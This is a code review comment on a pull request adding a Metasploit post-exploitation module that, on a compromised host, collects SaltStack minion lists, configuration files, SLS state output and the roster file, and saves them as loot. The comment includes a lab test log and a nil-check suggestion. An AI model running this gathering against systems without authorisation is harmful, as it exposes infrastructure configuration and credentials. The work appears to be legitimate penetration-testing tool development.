modules/post/multi/gather/saltstack_salt.rb

```diff
@@ -0,0 +1,301 @@
+    end
+    begin
+      out = cmd_exec('salt-key', '-L --output=yaml', datastore['TIMEOUT'])
+      vprint_status(out)
+      minions = YAML.safe_load(out)
+    rescue Psych::SyntaxError
+      print_error('Unable to load salt-key -L data')
+      return
+    end
+
+    tbl = Rex::Text::Table.new(
+      'Header' => 'Minions List',
+      'Indent' => 1,
+      'Columns' => ['Status', 'Minion Name']
+    )
+
+    store_path = store_loot('saltstack_minions', 'application/x-yaml', session, minions.to_yaml, 'minions.yaml', 'SaltStack Salt salt-key list')
+    print_good("#{peer} - minion file successfully retrieved and saved to #{store_path}")
+    minions['minions'].each do |minion|
+      tbl << ['Accepted', minion]
+    end
+    minions['minions_pre'].each do |minion|
+      tbl << ['Unaccepted', minion]
+    end
+    minions['minions_rejected'].each do |minion|
+      tbl << ['Rejected', minion]
+    end
+    minions['minions_denied'].each do |minion|
+      tbl << ['Denied', minion]
+    end
+    print_good(tbl.to_s)
+  end
+
+  def minion
+    print_status('Looking for salt minion config files')
+    # https://github.com/saltstack/salt/blob/b427688048fdbee106f910c22ebeb105eb30aa10/doc/ref/configuration/minion.rst#configuring-the-salt-minion
+    [
+      '/etc/salt/minion', # linux, osx
+      'C://salt//conf//minion',
+      '/usr/local/etc/salt/minion' # freebsd
+    ].each do |config|
+      next unless file?(config)
+
+      minion = YAML.safe_load(read_file(config))
+      if minion['master']
+        print_good("Minion master: #{minion['master']}")
+      end
+      store_path = store_loot('saltstack_minion', 'application/x-yaml', session, minion.to_yaml, 'minion.yaml', 'SaltStack Salt Minion File')
+      print_good("#{peer} - minion file successfully retrieved and saved to #{store_path}")
+      break # no need to process more
+    end
+  end
+
+  def master
+    list_minions
+    gather_minion_data if datastore['GETOS'] || datastore['GETHOSTNAME'] || datastore['GETIP']
+
+    # get sls files
+    unless command_exists?('salt')
+      print_error('salt not found on system')
+      return
+    end
+    print_status('Showing SLS')
+    output = cmd_exec('salt', "'#{datastore['MINIONS']}' state.show_sls '*'", datastore['TIMEOUT'])
+    store_path = store_loot('saltstack_sls', 'text/plain', session, output, 'sls.txt', 'SaltStack Salt Master SLS Output')
+    print_good("#{peer} - SLS output successfully retrieved and saved to #{store_path}")
+
+    # get roster
+    # https://github.com/saltstack/salt/blob/023528b3b1b108982989c4872c138d1796821752/doc/topics/ssh/roster.rst#salt-rosters
+    print_status('Loading roster')
+    priv_values = {}
+    ['/etc/salt/roster'].each do |config|
+      next unless file?(config)
+
+      begin
+        minions = YAML.safe_load(read_file(config))
+      rescue Psych::SyntaxError
+        print_error("Unable to load #{config}")
+        next
+      end
+      minions.each do |name, minion|
```

Comment:
You may want to guard this with 
`unless minions.nil?`
I found that the value `minions` came back as `nil` if salt-ssh was not installed on the minion:
```
[+] 192.168.134.113:60682 - minion data gathering successfully retrieved and saved to /home/tmoose/.msf4/loot/20210513144840_default_192.168.134.113_saltstack_minion_361736.bin
[+] Found minion: ubuntu-20041 (192.168.134.113) - Linux version 5.8.0-53-generic (buildd@lcy01-amd64-012) (gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0, GNU ld (GNU Binutils for Ubuntu) 2.34) #60~20.04.1-Ubuntu SMP Thu May 6 09:52:46 UTC 2021
[*] Showing SLS
[+] 192.168.134.113:60682 - SLS output successfully retrieved and saved to /home/tmoose/.msf4/loot/20210513144857_default_192.168.134.113_saltstack_sls_626023.txt
[*] Loading roster
[-] Post failed: NoMethodError undefined method `each' for nil:NilClass
[-] Call stack:
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/multi/gather/saltstack_salt.rb:223:in `block in master'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/multi/gather/saltstack_salt.rb:214:in `each'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/multi/gather/saltstack_salt.rb:214:in `master'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/multi/gather/saltstack_salt.rb:299:in `run'
[*] Post module execution completed
```